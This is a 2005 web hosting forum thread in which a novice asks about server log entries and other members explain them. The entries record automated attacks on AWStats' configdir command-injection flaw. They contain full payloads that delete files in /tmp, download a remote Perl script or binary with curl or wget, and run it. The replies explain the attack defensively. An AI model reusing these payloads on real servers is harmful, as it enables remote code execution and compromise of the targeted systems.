| View previous topic :: View next topic |
| Author |
Message |
PHILLIPO
-
Joined: 29 Jul 2005
Posts: 9
Location: SOUTHWEST UK
|
 Posted: Sat Oct 22, 2005 2:35 am Post subject: Server Log Help |
 |
|
how can I learn to decipher my server log - being relatively new to HTTP/hosting/servers etc , I would like to be able to understand the entries in laymans terms - or even learn the syntax of entries such as
204.91.207.11 - - [21/Oct/2005:09:38:27 +0100] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
anyone able to assist? |
|
| Back to top |
  |
 |
Anonymoose
-
Joined: 09 Sep 2003
Posts: 2192
|
| Posted: Sat Oct 22, 2005 8:54 am Post subject: |
|
|
You've picked a fairly tricky one as an example - it's actually a request looking to find a vulnerable version of AWStats and then do some pretty nasty stuff with perl shell trojans. The format itself is easy to explain though. http://www.bacuslabs.com/WsvlCLF.html has a great introduction. Check the section on "What is an Extended Common Log Format file?"
_________________
"Invent an idiot proof webserver and they'll invent a better idiot..." |
|
| Back to top |
|
|
PHILLIPO
-
Joined: 29 Jul 2005
Posts: 9
Location: SOUTHWEST UK
|
| Posted: Thu Dec 08, 2005 12:20 pm Post subject: Another complex log enrtry |
|
|
211.214.161.159 - - [04/Dec/2005:00:04:05 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
Can you tell me what AWstats is ?
What is this entry - in laymans terms. I may have mentioned that I was a hardware tech. back in 89-90 - but software jargon goes way over my head....thANK |
|
| Back to top |
|
|
Anonymoose
-
Joined: 09 Sep 2003
Posts: 2192
|
| Posted: Thu Dec 08, 2005 12:43 pm Post subject: |
|
|
AWStats is a Perl script which can be run on your server to provide a detailed breakdown of your access log. A while back, a vulnerability was discovered, which allowed unauthorised users to modify systems running the vulnerable version of the script.
The important part of the request in this respect is
| Quote: |
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
|
which is a request to the directory awstats (/awstats/) to access the file awstats.pl and pass the parameter
| Quote: |
configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
|
which is the part of the request that would exploit a vulnerable system by forcing it to download and execute code from an external site.
The 404 in your request line shows that the file was not found an error was returned to the attacker (which was most likely automated rather than an individual specifically targetting you).
Hope this clears things up.
_________________
"Invent an idiot proof webserver and they'll invent a better idiot..." |
|
| Back to top |
|
|
aprelium
-
Joined: 22 Mar 2002
Posts: 6800
|
| Posted: Thu Dec 08, 2005 12:46 pm Post subject: Re: Another complex log enrtry |
|
|
| PHILLIPO wrote: | | Can you tell me what AWstats is ? |
AWstats is a popular script which analyses web site logs.
_________________
Support Team
Aprelium - http://www.aprelium.com |
|
| Back to top |
 |
|
|
